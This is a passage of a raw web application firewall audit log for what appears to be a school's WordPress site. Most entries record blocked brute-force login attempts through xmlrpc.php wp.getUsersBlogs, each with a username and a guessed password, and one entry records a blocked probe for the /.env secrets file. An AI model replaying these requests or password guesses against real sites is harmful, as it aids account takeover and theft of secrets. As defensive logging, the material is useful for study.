Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5637c933-E-- --5637c933-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286488278127 5840 (- - -) Stopwatch2: 1749286488278127 5840; combined=4126, p1=499, p2=3420, p3=0, p4=0, p5=119, sr=94, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5637c933-Z-- --f499c812-A-- [07/Jun/2025:15:55:49 +0700] aEP-lWCOO9DrcKL2J_4EuQAAAM8 103.236.140.4 50110 103.236.140.4 8181 --f499c812-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f499c812-C-- wp.getUsersBlogs kasubagtu hello123 --f499c812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f499c812-E-- --f499c812-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286549779728 5524 (- - -) Stopwatch2: 1749286549779728 5524; combined=3992, p1=389, p2=3405, p3=0, p4=0, p5=114, sr=66, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f499c812-Z-- --03e17e52-A-- [07/Jun/2025:15:56:49 +0700] aEP-0RK9gc79coX6mHSViwAAAEQ 103.236.140.4 52272 103.236.140.4 8181 --03e17e52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --03e17e52-C-- wp.getUsersBlogs kasubagtu mypassword --03e17e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e17e52-E-- --03e17e52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286609024879 5689 (- - -) Stopwatch2: 1749286609024879 5689; combined=4233, p1=493, p2=3548, p3=0, p4=0, p5=111, sr=85, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e17e52-Z-- --39e4e348-A-- [07/Jun/2025:15:57:49 +0700] aEP_DZANhDjQAvBdMyHmtAAAAJc 103.236.140.4 54380 103.236.140.4 8181 --39e4e348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --39e4e348-C-- wp.getUsersBlogs kasubagtu zxcvb --39e4e348-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e4e348-E-- --39e4e348-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (109+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286669339201 5671 (- - -) Stopwatch2: 1749286669339201 5671; combined=3942, p1=482, p2=3213, p3=0, p4=0, p5=144, sr=91, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39e4e348-Z-- --c4dbfa7a-A-- [07/Jun/2025:15:58:14 +0700] aEP_JmCOO9DrcKL2J_4GXwAAAMc 103.236.140.4 55270 103.236.140.4 8181 --c4dbfa7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c4dbfa7a-C-- wp.getUsersBlogs kasubagtu 1234%^&* --c4dbfa7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4dbfa7a-E-- --c4dbfa7a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286694362408 5463 (- - -) Stopwatch2: 1749286694362408 5463; combined=3646, p1=441, p2=3033, p3=0, p4=0, p5=102, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4dbfa7a-Z-- --2120570e-A-- [07/Jun/2025:15:58:49 +0700] aEP_SWCOO9DrcKL2J_4GkgAAAMs 103.236.140.4 56358 103.236.140.4 8181 --2120570e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2120570e-C-- wp.getUsersBlogs kasubagtu Aa123456. --2120570e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2120570e-E-- --2120570e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286729271979 5308 (- - -) Stopwatch2: 1749286729271979 5308; combined=3826, p1=491, p2=3162, p3=0, p4=0, p5=101, sr=104, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2120570e-Z-- --cd884f6c-A-- [07/Jun/2025:15:59:49 +0700] aEP_hWCOO9DrcKL2J_4HAQAAAM8 103.236.140.4 58494 103.236.140.4 8181 --cd884f6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd884f6c-C-- wp.getUsersBlogs kasubagtu angel --cd884f6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd884f6c-E-- --cd884f6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286789139015 5362 (- - -) Stopwatch2: 1749286789139015 5362; combined=3728, p1=501, p2=3032, p3=0, p4=0, p5=111, sr=149, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd884f6c-Z-- --97098a58-A-- [07/Jun/2025:16:00:50 +0700] aEP_wpANhDjQAvBdMyHoWgAAAIQ 103.236.140.4 60336 103.236.140.4 8181 --97098a58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --97098a58-C-- wp.getUsersBlogs administrator administrator@ --97098a58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97098a58-E-- --97098a58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286850405878 5357 (- - -) Stopwatch2: 1749286850405878 5357; combined=3695, p1=469, p2=3060, p3=0, p4=0, p5=98, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97098a58-Z-- --dd4e2414-A-- [07/Jun/2025:16:01:50 +0700] aEP__hK9gc79coX6mHSYWQAAAEo 103.236.140.4 33668 103.236.140.4 8181 --dd4e2414-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 239 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dd4e2414-C-- wp.getUsersBlogs administrator smkn22-jkt.sch123456 --dd4e2414-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd4e2414-E-- --dd4e2414-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286910617748 5185 (- - -) Stopwatch2: 1749286910617748 5185; combined=3911, p1=461, p2=3264, p3=0, p4=0, p5=108, sr=84, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd4e2414-Z-- --5ecf8038-A-- [07/Jun/2025:16:02:50 +0700] aEQAOhK9gc79coX6mHSY2gAAAE0 103.236.140.4 35644 103.236.140.4 8181 --5ecf8038-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 236 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5ecf8038-C-- wp.getUsersBlogs administrator administrator1999 --5ecf8038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ecf8038-E-- --5ecf8038-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286970360097 5685 (- - -) Stopwatch2: 1749286970360097 5685; combined=4132, p1=653, p2=3305, p3=0, p4=0, p5=102, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ecf8038-Z-- --694b203a-A-- [07/Jun/2025:16:03:50 +0700] aEQAdhK9gc79coX6mHSZegAAAFc 103.236.140.4 37688 103.236.140.4 8181 --694b203a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --694b203a-C-- wp.getUsersBlogs administrator marketing2019 --694b203a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --694b203a-E-- --694b203a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287030379688 5133 (- - -) Stopwatch2: 1749287030379688 5133; combined=3676, p1=449, p2=3058, p3=0, p4=0, p5=101, sr=83, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --694b203a-Z-- --2b91ab1f-A-- [07/Jun/2025:16:04:50 +0700] aEQAsmCOO9DrcKL2J_4JhAAAAMY 103.236.140.4 39734 103.236.140.4 8181 --2b91ab1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2b91ab1f-C-- wp.getUsersBlogs administrator smkn22-jkt-sch-id@ --2b91ab1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b91ab1f-E-- --2b91ab1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287090003690 5290 (- - -) Stopwatch2: 1749287090003690 5290; combined=3563, p1=430, p2=2944, p3=0, p4=0, p5=110, sr=78, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b91ab1f-Z-- --829c4812-A-- [07/Jun/2025:16:05:33 +0700] aEQA3ZANhDjQAvBdMyHquwAAAJM 103.236.140.4 41192 103.236.140.4 8181 --829c4812-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.229.226 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.229.226 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --829c4812-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --829c4812-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749287133881797 1182 (- - -) Stopwatch2: 1749287133881797 1182; combined=324, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --829c4812-Z-- --ac32d367-A-- [07/Jun/2025:16:05:50 +0700] aEQA7hK9gc79coX6mHSaqAAAAEU 103.236.140.4 41750 103.236.140.4 8181 --ac32d367-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ac32d367-C-- wp.getUsersBlogs administrator admin098123 --ac32d367-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac32d367-E-- --ac32d367-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (121+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287150405731 5784 (- - -) Stopwatch2: 1749287150405731 5784; combined=4054, p1=548, p2=3343, p3=0, p4=0, p5=96, sr=90, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac32d367-Z-- --d94d850b-A-- [07/Jun/2025:16:06:50 +0700] aEQBKpANhDjQAvBdMyHrjwAAAJI 103.236.140.4 43772 103.236.140.4 8181 --d94d850b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d94d850b-C-- wp.getUsersBlogs administrator Internet --d94d850b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d94d850b-E-- --d94d850b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287210220009 5197 (- - -) Stopwatch2: 1749287210220009 5197; combined=4113, p1=486, p2=3405, p3=0, p4=0, p5=128, sr=101, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d94d850b-Z-- --08eeff18-A-- [07/Jun/2025:16:07:27 +0700] aEQBT_ClubEPOra_8Ukb6QAAAA0 103.236.140.4 44976 103.236.140.4 8181 --08eeff18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --08eeff18-C-- wp.getUsersBlogs administrator 1234%^&* --08eeff18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08eeff18-E-- --08eeff18-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749287247479851 5357 (- - -) Stopwatch2: 1749287247479851 5357; combined=4190, p1=497, p2=3489, p3=0, p4=0, p5=128, sr=91, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08eeff18-Z-- --430be549-A-- [07/Jun/2025:16:07:50 +0700] aEQBZhK9gc79coX6mHSbZQAAAEo 103.236.140.4 45818 103.236.140.4 8181 --430be549-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 